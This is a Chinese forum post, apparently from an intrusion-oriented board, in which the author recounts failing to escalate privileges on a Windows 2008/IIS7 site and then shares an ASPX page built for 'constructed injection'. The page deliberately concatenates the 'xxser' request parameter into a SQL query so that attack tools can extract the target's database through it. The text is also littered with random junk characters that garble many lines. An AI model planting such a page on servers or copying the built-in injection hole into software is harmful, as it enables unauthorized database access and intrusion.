昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。0 C4 w2 u! \' e9 w. L9 G8 W$ J" V; W% [6 F
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。' R. h$ g0 g3 w0 `* j8 _* \5 }
代码量不多,自己写个拉倒了。烦死了。
8 m* Q/ z5 N f. ^$ v: d( X1 v f ?
; i t2 }* A2 t5 z& I<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1 J- H1 g# W% L3 Z<html xmlns="http://www.w3.org/1999/xhtml">, E" E2 h9 k6 v( [1 M
<head runat="server">, K# J( [% ~8 K: @; a, C1 q$ Y
<title>暗影aspx构造注射专用页面</title>
( b" @/ v' v4 w( |: ~</head>
4 U8 r% D5 Z- O1 y, b4 K/ D<body>% o. f( i) n7 Y) X
<form id="form1" runat="server">
1 z# J5 x' O) E; W! j <div>
! z9 u0 u* L) A c- J$ T7 j! ` <script language="c#" runat="server">/ P5 j. g3 g4 g! i7 E% ~
. J3 k% V$ F6 b: Q# S void page_init(object sender, EventArgs e)1 {* d8 J1 i$ e- j# ^) T
{
( r7 z: O, Z" P: |# G
' H& t5 Q8 J9 v- v System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
- U4 Q$ S3 ?- p0 D1 w& H 3 U3 S1 O2 x$ U7 T, }. F! x
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
* g2 C, y" X& q conn.Open();1 B U6 L4 @1 \- c+ C' U
+ K. S; x7 s) ]5 m% ?5 ^ string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1/ {0 S' O l% l
; Q9 N0 V7 B B
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);( ]! Q" Q& A# p# |2 s$ j' ^6 I
int x = command.ExecuteNonQuery();
, {2 c# l$ w5 w4 q+ o: K Response.Write(i+"\n");
7 U9 }. j* u9 I$ T: J Response.Write(x);: _4 N; q v$ \; `6 q2 n! j
conn.Close();
/ f8 S5 n4 s- z& W* {0 w, _ }
+ _1 ^- e/ H) q- E0 B! |/ C, L7 Q
, H5 @% |9 t5 n J1 @' K& H7 T$ `( a </script>
1 d/ u9 f: b$ T' h, L. `5 L9 O! Q7 ?9 k </div>" Z* m- m" Q4 |/ v
</form>
3 Z: l8 Y; F5 |2 r7 i+ Q$ d</body>
( P. z8 T; E5 o6 R: i</html>
1 J/ c; `! ~2 V' |- H3 I# b8 z |